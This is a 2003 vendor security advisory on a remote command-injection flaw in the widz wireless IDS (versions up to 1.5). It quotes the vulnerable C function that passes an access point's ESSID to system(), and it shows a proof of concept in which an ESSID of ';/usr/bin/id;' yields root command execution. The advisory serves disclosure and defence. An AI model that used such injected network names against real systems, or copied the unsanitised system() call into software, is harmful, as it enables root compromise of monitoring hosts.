Secure Network Operations, Inc. http://www.secnetops.com Strategic Reconnaissance Team research@secnetops.com Team Lead Contact kf@secnetops.com Our Mission: ************************************************************************ Secure Network Operations offers expertise in Networking, Intrusion Detection Systems (IDS), Software Security Validation, and Corporate/Private Network Security. Our mission is to facilitate a secure and reliable Internet and inter-enterprise communications infrastructure through the products and services we offer. Quick Summary: ************************************************************************ Advisory Number : SRT2003-08-22-104 Product : widz (802.11 wireless IDS) Version : <= v1.5 Vendor : http://www.loud-fat-bloke.co.uk/w80211.html Class : remote Criticality : High Operating System(s) : *nix High Level Explanation ************************************************************************ High Level Description : widz make use of untrusted input with system() What to do : do not use widz in a production environment Technical Details ************************************************************************ Proof Of Concept Status : SNO has PoC code for this issue Low Level Description : WIDZ, "the first OpenSource wireless IDS" has the ability to Detects Rogue APs and Monkey-jacks. Null probes , floods, and it has a Mac Backlist and ESSID blacklist so you can catch the obvious badguys. from the file READMEwidz.txt we learn the following about widz_apmon.c This sad little program monitors an area for Access Points If finds an ap it compares it to a list of Authorised APs in a config file if the AP isnt in list it calls a program called Alert with an appropriate message. If you give widz_apmon a little test drive you will get the following. snifz0r widz # ./widz_apmon 1 eth1 monitor unknown AP essid=cerebrum ap_mac=00:30:65:03:00:55 unknown AP essid=cerebrum ap_mac=00:30:65:03:00:55 unknown AP essid=cerebrum ap_mac=00:30:65:03:00:55 unknown AP essid=cerebrum ap_mac=00:30:65:03:00:55 unknown AP essid=cerebrum ap_mac=00:30:65:03:00:55 unknown AP essid=cerebrum ap_mac=00:30:65:03:00:55 ... I wonder how that alert gets generated... File: widz_apmon.c do_alert(char *target) { char mess[100]; if ( DEBUG ) printf("Alert unknown AP %s\n", target); sprintf(mess,"Alert 'unknown AP %s\n'", target); system(mess); // Should do a check to see if we've alerted already but !!! } Hrmm thats no good... but fun to play with non the less. Go to apple airport and set network name to ';/usr/bin/id; (hint: use HostAP instead) snifz0r widz # ./widz_apmon 1 eth1 monitor unknown AP essid= uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel) sh: -c: line 3: unexpected EOF while looking for matching `'' sh: -c: line 4: syntax error: unexpected end of file At this point the attacker can pretty much do what they wish. As a side note this is not the only WIDZ program to make use of system() in this manor. Patch or Workaround : update will be in final version of widz Vendor Status : fix available "in the next couple of weeks" as of 07/26/03 Bugtraq URL : to be assigned ------------------------------------------------------------------------ This advisory was released by Secure Network Operations,Inc. as a matter of notification to help administrators protect their networks against the described vulnerability. Exploit source code is no longer released in our advisories. Contact research@secnetops.com for information on how to obtain exploit information.